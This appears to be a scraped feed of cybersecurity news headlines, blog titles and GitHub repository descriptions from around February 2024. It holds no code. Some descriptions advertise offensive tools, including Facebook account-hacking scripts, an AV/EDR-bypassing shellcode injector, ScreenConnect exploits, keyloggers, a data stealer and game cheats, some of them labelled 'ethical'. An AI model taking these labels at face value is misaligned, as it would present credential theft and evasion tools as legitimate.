In A Goldrush, Sell Shovels. 6 of 7 top companies in the world are… | by Prof Bill Buchanan OBE | ASecuritySite: When Bob Met Alice | Feb, 2024 | Medium
How Automation Detected Default Admin Credential Worth $500 | by the_unlucky_guy | Feb, 2024 | Medium
FTC sues H&R Block over deceptive 'free' online filing ads
Change Healthcare attack linked to state-backed threat actors
Konni RAT deployed via backdoored Russian government tool installer
New Cycode application security platform features unveiled
Numerous LockBit ransomware attacks target ConnectWise servers
Palo Alto Networks Launches Cortex Platform Offer
Beyond Identity Introduces Device360 for Security Risk Visibility Across All Devices
Redesigning the Network to Fend Off Living-Off-the-Land Tactics
Goodbye to something that didn’t exist … Location 23 | by Prof Bill Buchanan OBE | ASecuritySite: When Bob Met Alice | Feb, 2024 | Medium
Hackers Leak 2.5M Private Plane Owners' Data Linked to LA Intl. Airport Breach
Google Pay app shutting down in US, users have till June to move funds
Insomniac Games alerts employees hit by ransomware data breach
LockBit ransomware gang has over $110 million in unspent bitcoin
Orgs Face Major SEC Penalties for Failing to Disclose Breaches
Lovers' Spat? North Korea Backdoors Russian Foreign Affairs Ministry
Apple Beefs Up iMessage With Quantum-Resistant Encryption
Exclusive: Cyberattack on Change Healthcare was an exploit of the ConnectWise flaw
Malicious Apple Shortcuts could bypass security features to steal data
Avast to Pay $16.5M Fine For Selling Consumer Browsing Data
Malawi Immigration Dept. Halts Services Amid Cyberattack
Privacy Beats Ransomware as Top Insurance Concern
Operation Cronos: Who Are the LockBit Admins
Dormant PyPI Package Compromised to Spread Nova Sentinel Malware
The Future of MATIC and What to Expect in 2024
U-Haul says hacker accessed customer records using stolen creds
Alarm Over GenAI Risk Fuels Security Spending in Middle East & Africa
ConnectWise ScreenConnect Mass Exploitation Delivers Ransomware
Collaborating for Standardized Threat Investigation & Response
Microsoft finally expands free logging to all federal clients
Signal21 Beta Launch Bridges Gap in Blockchain Intelligence Services
New ScreenConnect RCE flaw exploited in ransomware attacks
Windows Photos gets AI magic eraser on Windows 10 and later
ICO Bans Serco Leisure's Use of Facial Recognition for Employees
Expect AI to play a major role in this year’s election cycle
Deepfake Threat: $2 Deceptive Content Undermines Election Integrity
78% of Organizations Suffer Repeat Ransomware Attacks After Paying
How to Import OST Files into Outlook
Missed IWCON 2023? Catch Recorded Expert Sessions Here (Pt. 2) | by InfoSec Write-ups | Feb, 2024 | InfoSec Write-ups
ConnectWise ScreenConnect attacks deliver malware
How to Use Tines's SOC Automation Capability Matrix
Microsoft Releases PyRIT - A Red Teaming Tool for Generative AI
Avast ordered to pay $16.5 million for misuse of user data
UnitedHealth confirms Optum hack behind US healthcare billing outage
The old, not the new: Basic security issues still biggest threat to enterprises
Secure email gateways struggle to keep pace with sophisticated phishing campaigns
New infosec products of the week: February 23, 2024
2024 will be a volatile year for cybersecurity as ransomware groups evolve
92% of companies eyeing investment in AI-powered software
How to Navigate the Evolving DDoS Attack Landscape
Facebook Accounts Targeted by Vietnamese Threat Groups
Researchers Detail Apple's Recent Zero-Click Shortcuts Vulnerability
Insurers Use Claims Data to Recommend Cybersecurity Technologies
FTC Slams Avast with $16.5 Million Fine for Selling Users' Browsing Data
Hubris May Have Contributed to Downfall of Ransomware Kingpin LockBit
Pharmacy Delays Across US Blamed on Nation-State Hackers
Microsoft has started testing Wi-Fi 7 support in Windows 11
Microsoft now force installing Windows 11 23H2 on eligible PCs
NSA Cybersecurity Director Rob Joyce to Retire
iSoon's Secret APT Status Exposes China's Foreign Hacking Machination
Zero-Click Apple Shortcuts Vulnerability Allows Silent Data Theft
HTTP-Only Sessions: No Problem? ATO Still Lurks via XSS! | by Kyrillos Maged | Feb, 2024 | Medium
SHA-256 Under the Hood. Look inside the popular hash function. | Medium
High-volume malware campaigns involve Google Cloud Run exploitation
Sophisticated PlugX backdoor variant leveraged in Mustang Panda attacks
ScreenConnect servers hacked in LockBit ransomware attacks
Bitwarden’s new auto-fill option adds phishing resistance
LATAM Malware Variants - 2023 Technical Updates
Russian Cyberattackers Launch Multi-Phase PsyOps Campaign
TikTok’s latest actions to combat misinformation shows it’s not just a U.S. problem
Massive AT&T outage impacts US mobile subscribers
FTC to ban Avast from selling browsing data for advertising purposes
SMBs at Risk From SendGrid-Focused Phishing Tactics
Apple Unveils PQ3 Protocol - Post-Quantum Encryption for iMessage
UOB, Samsung Back Singapore's Startale Labs in $7 Million Web3 Push
Apple Shortcuts Vulnerability Exposes Sensitive Data, Update Now!
Massive AT&T, Verizon, and T-Mobile outage impacts US customers
Iran-Backed Charming Kitten Stages Fake Webinar Platform to Ensnare Targets
4 Key Steps to Reevaluate Your Cybersecurity Priorities
Change Healthcare Cyber-Attack Leads to Prescription Delays
World Economic Forum 2024: What You Need To Know About The Global Cybersecurity Outlook | by Anthony Today | ILLUMINATION | Jan, 2024 | Medium
SCCM Hierarchy Takeover with High Availability | by Garrett Foster | Feb, 2024 | Posts By SpecterOps Team Members
Can the industry go passwordless by 2025?
Migo Malware Targets Redis Servers And Disables Protection Features | Daily Security Review
2024 Global Threat Report Trends and Overview
TinyTurla-NG in-depth tooling and command and control analysis
ConnectWise sounds the alarm on two vulnerabilities
LockBit: Lessons learned on winning the war on cybercrime
New Redis miner Migo uses novel system weakening techniques
A New Age of Hacktivism
Cybercriminals Weaponizing Open-Source SSH-Snake Tool for Network Attacks
Russian Government Software Backdoored to Deploy Konni RAT Malware
U.S. Offers $15 Million Bounty to Hunt Down LockBit Ransomware Leaders
New Wi-Fi Vulnerabilities Expose Android and Linux Devices to Hackers
Cambridge University Cyberattack Claimed By Anonymous Sudan Using DDoS Attacks | Daily Security Review
ISoon Leaks Internal Documents, GitHub Data Leak Reveals Sensitive Documents & Conversation Logs From Chinese Ministry | Daily Security Review
Joomla Fixes Critical XSS Vulnerabilities In Joomla CMS | Daily Security Review
Why Front-End Development Matters for Online Businesses?
New Linux Malware "Migo" Exploits Redis for Cryptojacking, Disables Security
Top Software Development Outsourcing Trends
Types of SaaS Applications: Categories and Examples
Apple Approves Fake App Before Real Rabby Wallet, Users' Funds Stolen
Bluzelle's Curium App Makes Crypto Earning Effortless
Crypto Exchange FixedFloat Hacked: $26 Million in BTC, ETH Stolen
Cybersecurity fears drive a return to on-premise infrastructure from cloud computing
Attackers exploiting ConnectWise ScreenConnect flaws, fixes available for all users (CVE-2024-1709, CVE-2024-1708)
A step-by-step plan for safe use of GenAI models for software development
Microsoft begins broadening free cloud logging capabilities
MSPs undergo transformation in response to persistent cyber threats
Wire fraud scams escalate in real estate deals
Attack velocity surges with average breakout time down to only 62 minutes
Beyond Identity Device360 identifies device security risks
Bitsight empowers enterprises to secure the digital supply chain
Searchlight Cyber integrates MITRE ATT&CK Mapping into DarkIQ for dark web monitoring
Information stealer takes aim at Vietnamese businesses
Microsoft expands free logging capabilities after May breach
New SSH-Snake malware steals SSH keys to spread across the network
ScreenConnect critical bug now under attack as exploit code emerges
US govt shares cyberattack defense tips for water utilities
US offers $15 million bounty for info on LockBit ransomware gang
Fraudsters tried to scam Apple out of 5,000 iPhones worth over $3 million
Hackers abuse Google Cloud Run in massive banking trojan campaign
Joomla fixes XSS flaws that could expose sites to RCE attacks
LockBit ransomware secretly building next-gen encryptor before takedown
How CISOs Balance Business Growth, Security in Cyber-Threat Landscape
'VoltSchemer' Hack Allows Wireless Charger Takeovers
DoT, White House Tackle the Chinese Threat to US Port Security
AI-Generated Patches Could Ease Developer, Operations Workload
Critical Vulnerability in VMware vSphere Plug-in Allows Session Hijacking
Critical ConnectWise RMM Bug Poised for Exploitation Avalanche
Library Cyber Defenses Are Falling Down
El Al Flight Crew Suffers Midflight Communication Disruption
'Lucifer' Botnet Turns Up the Heat on Apache Hadoop Servers
Biden Executive Order to Bolster US Maritime Cybersecurity
Businesses Increase Cybersecurity as Budgets Surge in 2024
Adapting Your Security to the Latest Data Breach Trends
Chinese Duo Found Guilty of $3m Apple Fraud Plot
Cyber Pros Embrace AI, Over 80% Believe It Will Enhance Jobs
OWASP Releases Security Checklist Generative AI Deployment
Ransomware Warning as CVSS 10.0 ScreenConnect Bug is Exploited
Over 40% of Firms Struggle With Cybersecurity Talent Shortage
Russian-Aligned Network Doppelgänger Targets German Elections
Shining Star of DePIN: Referral System on DATS Project | by Dats Project | Feb, 2024 | Medium
Microsoft Breach — What Happened? What Should Azure Admins Do? | by Andy Robbins | Feb, 2024 | Posts By SpecterOps Team Members
Bug bounty writeup : 2F/OTP Bypass on Registeration via Response manipulation | by NoorHomaid | Feb, 2024 | Medium
Retirement of NSA cyber chief imminent
Ukraine subjected to new Russian influence operation
Threat Intelligence & Threat Hunting – Chris Cochran – ESW Vault
Alternative cyber defense techniques urged by ex-NSA director
US GOV OFFERS A REWARD OF UP TO $15M FOR INFO ON LOCKBIT GANG MEMBERS AND AFFILIATES
7 Steps to Building Quantum Resilience
How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
Sophos NDR is now available on AWS
Mustang Panda Targets Asia with Advanced PlugX Variant DOPLUGS
Check Point introduces Quantum Force, series of AI-powered firewalls
VMware pushes admins to uninstall vulnerable, deprecated vSphere plugin (CVE-2024-22245, CVE-2024-22250)
How to Prepare for DDoS Attacks During Peak Business Times
Median Ransomware Demands Grow to $600K a Pop
We're at a Pivotal Moment for AI and Cybersecurity
Iranian APTs Dress Up as Hacktivists for Disruption, Influence Ops
Meta Disrupts 8 Spyware Firms, 3 Fake News Networks
Microsoft Threat Report: How Russia’s War on Ukraine Is Impacting the Global Cybersecurity Community
Like Seat Belts and Airbags, 2FA Must Be Mandatory ASAP
Establishing Reward Criteria for Reporting Bugs in AI Products
Misconfigured Custom Salesforce Apps Expose Corporate Data
10 Security Metrics Categories CISOs Should Present to the Board
Time to Secure Cloud-Native Apps Is Now
Wyze Cameras Allow Accidental User Spying
CISA HBOM Framework Doesn't Go Far Enough
Automate Routine Operational Workflows with Generative AI
Q&A: The Cybersecurity Training Gap in Industrial Networks
Cyber Insurance Needs to Evolve to Ensure Greater Benefit
CISO and CIO Convergence: Ready or Not, Here It Comes
Microsoft Adds Face Check to Entra Verified ID
Cybersecurity's Transformative Shift
Demand for 'Secure by Design' Product Growing, Creating Opportunity for Software Security Specialization
New Wave of 'Anatsa' Banking Trojans Targets Android Users in Europe
Key Building Blocks to Advance American Leadership in AI
Effective Incident Response Relies on Internal and External Partnerships
Google's Cloud Run Service Spreads Several Bank Trojans
How Changes in State CIO Priorities for 2024 Apply to API Security
Strata Identity Reins in Global Access and Compliance Challenges With Cross-Border Orchestration Recipes
Global Law Enforcement Disrupts LockBit Ransomware Gang
Enterprises Worry End Users Will Be the Cause of Next Major Breach
Joomla XSS Bugs Open Millions of Websites to RCE
What Using Security to Regulate AI Chips Could Look Like
Name That Toon: Keys to the Kingdom
Quorum Cyber Joins Elite Microsoft FastTrack-Ready Partner Group
5 Essential Insights from the 'Microsoft Digital Defense Report 2023'
'KeyTrap' DNS Bug Threatens Widespread Internet Outages
Vade Releases 2023 Phishers' Favorites Report
Hacked Iraqi Voter Information Found for Sale Online
Exclusive: eSentire Confirms Rhysida Ransomware Victims
IBM: Identity Compromises Surge as Top Initial Access Method for Cyber
Russian Hackers Launch Email Campaigns to Demoralize Ukrainians
NCSC Sounds Alarm Over Private Branch Exchange Attacks
Are DDoS Simulation Tests Actually Legal?
Six steps for stronger cloud security
Critical flaw found in deprecated VMware EAP. Uninstall it now
6 Ways to Simplify SaaS Identity Governance
Unsecured Database Leaks 153 GB of Filipino Student and Family Data
CampusGuard introduces new online training courses
Hummingbird Automations improves efficiency for compliance professionals
Attacker Breakout Time Falls to Just One Hour
Does The Company Anxun Xinxi(I-Soon) Provide APT as a Service? | by Wes | Feb, 2024 | Medium
What You Need To Know About The Future Of ChatGPT | by Anthony Today | CodeX | Feb, 2024 | Medium
Explore topics
Medium
Microsoft Breach — How Can I See This In BloodHound? | by Stephen Hinck | Feb, 2024 | Posts By SpecterOps Team Members
Cross-Site Scripting Explainded. What is Cross-Site Scripting? | by Rodrigo Campos | Feb, 2024 | Medium
The Easiest Way to Find CVEs at the Moment? GitHub Dorks! | by Florian Walter | Feb, 2024 | Medium
The Most Dangerous Entra Role You’ve (Probably) Never Heard Of | by Andy Robbins | Feb, 2024 | Posts By SpecterOps Team Members
How I Hacked the Dutch Government: Exploiting an Innocent Image for Remote Code Execution | by Mukund Bhuva | Feb, 2024 | Medium
How easy deepfake can join your Zoom and Google meeting | by VXRL | Feb, 2024 | Medium
Microsoft Exchange flaw CVE-2024-21410 could impact up to 97,000 servers
Cybersecurity for Healthcare—Diagnosing the Threat Landscape and Prescribing Solutions for Recovery
A type of cyberattack that could set your smartphone on fire using its wireless charger
Wannabe Security Researcher!?!? -
Vorhängeschloss knacken mit Kamm (Comb) Pick - deutsch UHD lockpicking #lockpicking #60fps #uhd - YouTube
DarkGate: Opening Gates for Financially Motivated Threat Actors
RCMP networks targeted by cyberattack | CBC News
Chilling warning Chinese cyberattack 'will be 100 times worse' than AT&T network outage - The Mirror US
878. ERA Deadlock picked again & gutted to show levers are all there and haven’t been tampered with - YouTube
Continuously fuzzing Python C extensions | Trail of Bits Blog
Deep Dive into DLL Sideloading and DLL Hijacking - Malware Development Course - YouTube
ASTRA: An Internet Mystery - YouTube
GreyNoise Labs - Code injection or backdoor: A new look at Ivanti’s CVE-2021-44529
Join Cloud Security Office Hours!
GitHub - Azure/PyRIT: The Python Risk Identification Tool for generative AI (PyRIT) is an open access automation framework to empower security professionals and machine learning engineers to proactively find risks in their generative AI systems.
Vulnerability Summary for the Week of February 12, 2024 | CISA
What Happened to the Master 570? An Investigation - YouTube
GitHub - KaanSK/go-epss: A Golang library for interacting with the EPSS (Exploit Prediction Scoring System).
SEC.gov | Request Rate Threshold Exceeded
Report: Leaked Files Expose PRC International Hacking Efforts
GitHub - W01fh4cker/ScreenConnect-AuthBypass-RCE: ScreenConnect AuthBypass(cve-2024-1709) --> RCE!!!
MSN
Introduction to Security in SDLC with SAST
Fully Homomorphic Encryption | We are a community of researchers and developers interested in advancing homomorphic encryption and other secure computation techniques.
LockBit takedown: Police shut more than 14,000 accounts on Mega, Tutanota and Protonmail
Brussels spyware crisis expands: Two MEPs hit in phone-hacking security breach – POLITICO
Microsoft Reacts to Major Breach by Unlocking Logging Security Tools for Everyone
AT&T down: Massive disruption to mobile networks with iPhones stuck in SOS mode - The Mirror US
One Small Shift for Better Asset Management
GitHub - jhonnybonny/auth_bypass_connectwise_screenconnect: Exploit ConnectWise ScreenConnect (bypass authentication)
“To live is to fight, to fight is to live! - IBM ODM Remote Code Execution
SHA-256 Under the Hood. Look inside the popular hash function. | Medium
A stealthy threat uncovered: TeaBot on Google Play Store | Cleafy Labs
/17/ ABUS GRANIT 37/55 (ABUS PLUS CORE) - disc detainer lock + tips and tricks - YouTube
Experts, Public Figures Sign Letter for AI Deepfake Regulation
How to make your LLMs resistant to Prompt Injection Attacks | by Austin Starks | Feb, 2024 | Medium
Optum Solutions Status - Update: Some applications are experiencing connectivity issues.
Masterlock 570: The Shocking Info About What's Actually Going On Inside This Thing! - YouTube
LockBit affiliates arrested in Ukraine, Poland
TruffleHog Now Detects AWS Canaries without setting them off ◆ Truffle Security Co.
Apple Adds Post-Quantum Encryption to iMessage - SecurityWeek
Top 10 Social Engineering attacks
re: Zyxel VPN Series Pre-auth Remote Command Execution - Blog - VulnCheck
HACKER_CULTURE (2024) | Documentary Trailer | Internet Underground - YouTube
ISO 27001 and GDPR compliance with CyberComply - YouTube
Smuggling Malware in Test Code
Device360 | Beyond Identity
RansomHouse encryptor malware analysis — ShadowStackRE
Blog - iMessage with PQ3: The new state of the art in quantum-secure messaging at scale - Apple Security Research
Brussels spyware bombshell: Surveillance software found on officials’ phones – POLITICO
Leaked documents expose China's alleged offensive cyber tactics | Digital Watch Observatory
nytimes.com
Detection Rules Development Framework – Purple Team
SolarWinds Patches Three Critical RCE Vulnerabilities - SecAlerts
awesome-cloud-native-security
Security Checks for CTO/CISO
ZAuthSecurity
Proof of Concept building simple chat application using Golang & VueJS & Websocket
Spring-Security-With-Active-Directory
Comp430 Course Work
Proof of concept over monitoring solution over AKS
Ultimate-WordPress-Security-with-Htaccess
Contains source code for the project that was created in DU Hacks 3.0
DU hacks 2024
BirthdayWish is a Kotlin Android app designed to deliver personalized birthday greetings in a unique and memorable way. With customizable messages, captivating background music, and interactive digital gifting, BirthdayWish offers a delightful user experi
Sboot_B26_Security
Ethical_Hacking
Network-Security-Groups-NSGs-and-Inspecting-Traffic-Between-Azure-Virtual-Machines
cst-security
Hacking With SwiftUI iOS 17 Edition
Full-stack Todo App using Java, Spring Boot 3, Spring Data JPA, Spring Security, JWT, JavaScript, React JS & MySQL
Wizbuy - DDU Hacks 3.0 Submission
The group 11 repo for Hack Trinity.
Proof of Concept Repo for setting up Flux
인프런 springSecurity 강의
COSMO is a fully featured internal hack for Valorant written in C++
How I achieve The Consolation Prize in Cyber Security Awareness Video Competition, 2023
Hack Illinois 2024 Project
.NET library and package for server-side validation of in-app payments from multiple vendors (google, apple). Designed for developers who need a unified and reliable way to validate subscriptions and purchases. VouchR simplifies the integration and valida
Cyber Security Internship @ CodeAlpha February 2024
spring-jwt-security3
Hack ARMAS DE GUERRA Recetas Quimicas Digitalizadas Informatica PiD + C Y/O Cerebros Humanos
Tools Hack Facebook
Aftas_security
this script is for hacking facebook on puting id and password and give us a accounts in the friend and the passwords only Ali123 only
Script for extracting Network Security Groups
Exemplo de IaC com terraform provisionando uma instância EC2 com IP Elastico e security group
our teams project on food security
Information-Security-with-HelmetJS
ci_cd_SecurityLabs
A Basic Spring Boot Application with impl of Spring Security 6
SecurityApplication
Proof of Concept utilizing free resources available online
JSONPath proof-of-concept tool (as used during development of RFC 9535)
securityproject
SpringSecuritySample
A python web based CRUD application; sort of a skeleton and proof of concept project
Course work for CyberSecurityBase 2024 -course
Proof of Concept for ELK deployment
Lesson-6.-Security-assessment-and-analysis
Proof of Concept
SpringSecurityUsingDatabase
A dating app - in progress. Implementing using Java's Spring Boot, JPA (Hibernate), Spring Security, AWS's DynamoDB (NoSQL), and SQL DB for back-end. For Front-end, React Native, React, and FireBase.
This is a proof of concept: IOC in docker containers
Proof of Concept for a Vantage6 server running in a kubernetes cluster
For Sybyl custom proof-of-concept CIAM project
Blox Fruits Blatant Hacking PvP script. Like Cocaine, But for Blox Fruits.
facebook hacker facebook hacking termux windows 10 PC python file
Hacking together a HID for potential auto testing.
A simple script to automate the recognition phase in ethical hacking
CSRF_POC_Generate is a proof-of-concept (POC) tool designed to demonstrate Cross-Site Request Forgery (CSRF) vulnerabilities in web applications.
⛵️🦕 Set sail on your Hack Club's journey to new horizons of innovation
Game Cheat Imgui Hack Menu Cpp
The Esp and Aimbot hack for Valorant, which includes source code for an internal cheat with extensive features developed in C++.
This notebook will introduce some foundation machine learning and data science concepts by exploring the problem of heart disease classification. It is intended to be an end-to-end example of what a data science and machine learning proof of concept migh
boot-security3
Eternalblue Exploit - developed by the NSA. Leaked by the Shadow Brokers hacker group in 2017. Top operating system exposed windows 7 professional. Also known as as MS17-010 takes advantage of a flaw in a network file-sharing protocol called SMBv1.
A proof of concept tool for using local LLMs to transform messy text documents into structured JSON
Setting up ELK to collect and analyze Nginx logs for troubleshooting, monitoring, and security purposes.
Spring Boot / Postman / MongoDB / Java
Practicing some more of Spring Security
an ethical hacking tool, complementary to hydra, to brute force the login page of a website.
cyber_security
Utilizing YOLOv8 with transfer learning for real-time crop disease detection. Achieves 88% mean Average Precision at IoU 50, 81.7% recall, and 82.3% precision across 6 classes on a dataset of 3462 photos. Offers fast deployment with minimal labeled data f
Hacking Exposed Juventus LAB
Proof of concept Athena Mercure integration
Torrentpier v2.4.1. CVE-2024-1651. Remote Code Execution (RCE).
Fortnite External Hack 2024 Aimbot Esp Wallhack
Open-API-security-among-Web-Services-ad-Machine-Learning
tci-security-activity
HA-GoogleDriveSecurity
learn-spring-security
Proof of concept companion of The Last Challenge Attack paper
key-logger is a python application that can be used to keep track of data entered by the user, this application can be used for parent-child controlling and ethical hacking.
estudo sobre spring security
A Proof of Concept for a Pikmin-like Bird Game
In the enchanting realm of gaming, DLLX1 reigns supreme as a paragon of excellence. A fully realized internal hack tailored exclusively for Valorant,
A POC (proof-of-concept) to visualise inngest events & functions.
Class code - likely to always be very messy as it's code we just hack about
An app to help people with adhd to organize their daily tasks. This app is written by rookie programmers as a proof of concept for a hackathon.
PALMS Playwright Typescript Proof of Concept
spring-security-examples
This is simple spring boot project with mvc model and spring security.
security-start-backend
Experience the ultimate cheat tool for Counter-Strike 2 with a range of features including Enemy glow ESP (Wallhack), Bunnyhop, Triggerbot, Aimbot, No flashbang, Radar hack, and Panic mode. This cheat ensures enhanced gameplay while prioritizing safety wi
Discover the perfect blend of security and comfort at this women's hostel in Coimbatore, with modern facilities for a worry-free stay.
Springboot-Jwt Security, Login/ Logout, Roles and Permissions and JpaAuditing
An application that provides articles about Hacker News. It discusses new posts, comments, and jobs submitted to the website.
cloud_security_presentation on Feb_2024 for Krishna college
Proof of concept for white labelling ONS intereactives
A proof of concept showing how to sign a transaction for ETH by combining different parts of the NEAR tech stack
This repository contains theoretical concepts within the information security domain. Suitable for newcomers and experienced professionals alike.
Proof of concept of clean architecture in SwiftUI with MVVM.
Proof of concept using dosubl to create a fcmp like function for a rolling sum of size three
Electiva 6
IoT-based Security System for Personal Collectibles | Solo Project
Proof-of-concept implementation of SD-JWS EBSI EBIP
this runs completely locally and offine mode which provide security to your confidentail PDF's
A hacking to script which scans a website with nmap and list the exploits possible
A guided walkthrough to the "Blue" room on Try Hack Me
Learning Streamlit in MLH Hack Week AI/ML
RTP streamer/receiver for yi-hack cams
SECURITY
192211025-CNS-FOR-HACKING
Spring application with Jenkins pipeline script to demonstrate secure pipelines
SkypeACLKeyGen.exe analysis for hacking team
Proof of concept to combine audio and video input using Lab Streaming Layer
Ethicka Hacking Techniques - 19CS417
A proof-of-concept on using Markov Chains to optimise marketing spend
AX7020 board is widely used in security monitoring, automotive electronics, machine vision, intelligent manufacturing, video and audio acquisition and processing, medical equipment, instrumentation, smart grid and other industries.
Proof-of-concept RISC OS syscall wrapper crate
Discussions on research results and policy proposals related to AI safety and security
#SpringSecurity 6.xx && JWT && REST API 형식 인증 인가 서비스 테스트
computer-security
SpringOAuth
A proof of concept for a rewrite of https://github.com/apace100/apoli
This project serves as a central hub for the development and dissemination of innovative security upgrades, tools, and best practices aimed at fortifying servers, networks, and other critical IT assets against the evolving threats of the digital age.
HTML Proof of Concept
Basic Authentication Example using Spring Boot 3.2.2 and Spring Security 6.2.1
a learning tool to help understand and categorize Cyber security terms and concepts.
An html local-storage editor for game hacking
master-1-security
Explore advanced fraud detection methods in financial transactions with ML and DL models. Detect patterns, analyze data, and compare model performance for robust security measures. Ideal for financial institutions aiming to enhance fraud prevention strate
CyberSecurity
aftas-security
CryptGuard is a secure file storage system with advanced encryption for protecting sensitive data. Easily upload, store, and manage your files with confidence, knowing that your data is encrypted both at rest and in transit. Ensure the confidentiality and
Simple algorithms that I will write with Rust/Python for my school Cyber Security class.Hopefully I will include the time complexities
Configuration Hardening Assessment PowerShell Script (CHAPS) is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed.
Revolutionizing the financial ecosystem with Instant Card Issuance (ICI) using blockchain and AI-driven security. Secure, fast, and user-friendly virtual card issuance.
tool designed to upgrade standard DNS queries to encrypted DNS/TLS queries for enhanced privacy and security.
Introducing "port_scan" - the fastest port scanning tool around! With lightning-speed scans, advanced algorithms, and reliable results, it's your go-to option for enhancing network security. Find it on GitHub for seamless integration and easy usability.
Meta-security-and-restriction-
A project on implementing Spring Security
spring_security_sample
an NGINX proof of concept that highlights how you can centralize multiple services behind a single reverse proxy
Todo-System-using-Spring-Security
Explores topics related to both front end and backend web development including web security, scalable architecture, web frameworks, databases, and object relational mappers.
Mobile-security-assessment-project
Firefox extension that checks for flaws in the email security of the current domain
a description and proof-of-concept of a proposed flavor of markdown for end-users on social websites
This is my Final Year Project Using Java, J2EE, Spring boot, Spring Security, Spring Web , Spring Data Jpa, Hibernate, Spring Dev Tool, Spring MVC, Spring IOC, Thymeleaf, HTML, CSS, JavaScript, Bootstrap-5, JQuery, MySql, Apache Tomcat ,Eclipse, Vs Code,
Welcome Hackers, this is your go-to resource for learning cybersecurity stuff everyday :)
Các bài code lớn Nhập môn An toàn thông tin HUST
Project name: Chord Hands. Code for submitted project for Hack Pompey 2024 on the 16th of March.
Security-Project-
En este Repositorio encontraremos una variedad de archivos pdf relacionado con Ciberseguridad , Tipos Auditorias , Redes , Hacking , Modelo OSI , muy "Completos " Entre otras muchas cosas mas te recomiendo "TOTALMENTE" que le des una mirada no te arrenpe
SpringBoot-Security-Example
Proof of concept for data exchange between Flutter and web app inside webview.
CS2-Tiger-Hack is a sophisticated cheat tool for Counter-Strike 2, featuring aimbot, visuals, and other utilities. It offers stable releases, building options, and debug protection, with credits to various repositories.
Hacking With Swift Project 17. Flash cards for learning new language.
spring-security-samples
Proof of concept - Angular - Use library
In this repository I upload the assesment for the module I've taken at Queens University of Belfast (QUB).
Tech stuff about security
free cat using laravel. This is a proof of concept
Information-security
시큐리티 공부
Desafio para implementação do JWT token com Sprint Security
boot-security2
Hacker rank python practice codes
This is a Proof of concept test automation for Qualtrics MX
Hwid Spoofer is a C# application that enables you to alter various system identifiers on your Windows computer, offering randomization of critical identifiers like HWID, PC GUID, computer name, product ID, and even MAC address. This tool allows for enhanc
Machine-Learning-and-deep-Learning-Approaches-for-Cyber-Security
Backend - sistema de login com Java Spring Security e JWT
Ultra hack for Arduino + USB serial / CDC. Only demonstrates ideas.
This is a simple password security checker with HTML, CSS & JS.
spring-security-web
gimkit hacks for gimbucks
Springboot 3 with jwt security
Harvard University’s CS50 course teaches how to think algorithmically and solve problems efficiently. Topics include abstraction, algorithms, data structures, encapsulation, resource management, security, software engineering, and web programming. Languag
Security-Notes
spring-security-jwt
My Final Year Project from Bachelor's of IT in Internet of Things (IoT). So grateful to have come this far. This repository contains all the codings, my FYP poster, output results and some pictures from the prototype I built.
System of voice control. Builds voice model based on user's recorded audio. Uses stored model to provide security checking
Keylogger is designed for ethical use in IT organizations. It records keystrokes to troubleshoot technical issues in computer systems and business networks. Emphasizing on responsible usage and diverging from the typical association with malicious intent,
PYNT_Automated_API_Security_Testing_Framework
Refix: Enhancing Smart Contract Security
Full Stack Application with Spring Security Backend, Keycloak Authentication, PostgreSQL Database, Docker and a Next.js Frontend
Hack to build
This repository includes some proofs-of-concept applications of a Path-Integral Cellular Automaton for Chemical Reaction Networks.
demo_security_mvc-master
I am a ethical hacker
A robust web application leveraging Django framework for online buying/selling. Features include user authentication, product management, shopping cart, order processing, search/filter, reviews/ratings, admin dashboard, responsive design. Utilizes Postgre
a hackbot proof-of-concept
forum-security
SpringBoot 3 Spring Security JWT token
Loging Springboot Spring Security Backend Jws
implemented parallel merge sort with double merging as a proof of concept for the attached published article regarding this topic.
simple Proof of concept using cuda for bruteforcing
FreeCodeCamp Information security projects and work
security
security-tools
Hacker Rank solutions from Dreamer the lead engineer of Fossil Logic
security-help
This proof of concept is to evaluate how search engines can be used to index Beckn websites and make them discoverable. It is an alternate model to a central registry based mechanism.
github-copilot-admin-security
Repository for Docker security works and Docker deployment pipelines
WebGL proof-of-concept
My project is about use GUI in encrypt &decrypt text with a different algorithms
dotnet-security-token
Регистрация / авторизация
Hacker Rank solutions in C++ from Dreamer the lead engineer of Fossil Logic
Precise controls hack for Puzzle Bobble
security_app_react_native
proof-of-concept indexer for outbox messages
Effortlessly capture and store employee details with the EmpManagement form. This user-friendly tool ensures smooth onboarding and customization while maintaining data security. Prioritize thorough testing and clear documentation for an enhanced user expe
sandbox-spring-security
Disk Spoof Conceal your storage device.GPU Spoof Mask your graphics card details.RAM Spoof Hide your system memory specifications.GUID Spoof Alter your system globally unique identifier.BIOS Spoof Modify BIOS information for added security..System Spoof.M
next-js-authentication-role-based-security-
Enhance the security of your KeyAuth ImGui example by implementing server-side controls, packet encryption, and single-use packets, offering robust protection against unauthorized access.
Game Cheat Imgui Hack Menu Cpp
This project is just to do random Proof Of Concepts.
The Esp and Aimbot hack for Valorant, which includes source code for an internal cheat with extensive features developed in C++.
Proof of Concept for AB Testing in Flutter
COSMO is a fully featured internal hack for Valorant written in C++
Proof of concept for an extended purpose biology data management API
SpringMVCHibernateWithSpringSecurityExample
Proof of Concept Project; a user - ChatGPT (GPT-4) search query application, using Flutter, .NET, and ChatGPT. The app consists of 4 main components; the C# .NET backend server connected to a SQL Server Database and ChatGPT Api, with the Flutter client ap
security-webauthn-quickstart
Experience the future of Roblox exploiting with Nezur Roblox Hack, offering a safe and comprehensive suite of cheats including ESP, Aimbot, and more.
T3RM1NAL
HW2_CyberSecurity
This is my warehouse’s research on vulnerabilities in the security industry
hacking on a symbolic mathematics engine
Proof of concept Windows shellcode injector to bypass AV and EDR
security_web_app
security
(Proof of concept) Verhindert dass im RuhrFurMeet zu krass gesabbert wird
The Stealer is an educational project focused on data security and privacy practices within computer systems. It explores data extraction, encryption, and transmission methods, empowering users to understand digital vulnerabilities and ethical practices.
A repository to explore security measures on the web
A proof of concept
Cisco's CyberOps Associate cert provides foundational cybersecurity skills. It focuses on security monitoring, data analysis, and incident response. Ideal for entry-level or transitioning pros, it prepares for real-world challenges.
Spring Security in Action 실습 예제 코드
ДЗ по курсу "Безопасность интернет - приложений"
Este projeto é um sistema backend para uma imobiliária, permitindo o gerenciamento de casas, clientes e usuários. Ele utiliza Spring Boot, JPA e Spring Security.
Ethical-Hacking-Class
Tools... for hackers!
Security_Bootstrap
Utilities to Support Integrated Food Security Phase Classification (IPC) Data Analysis and Visualisation
Game-Hacking
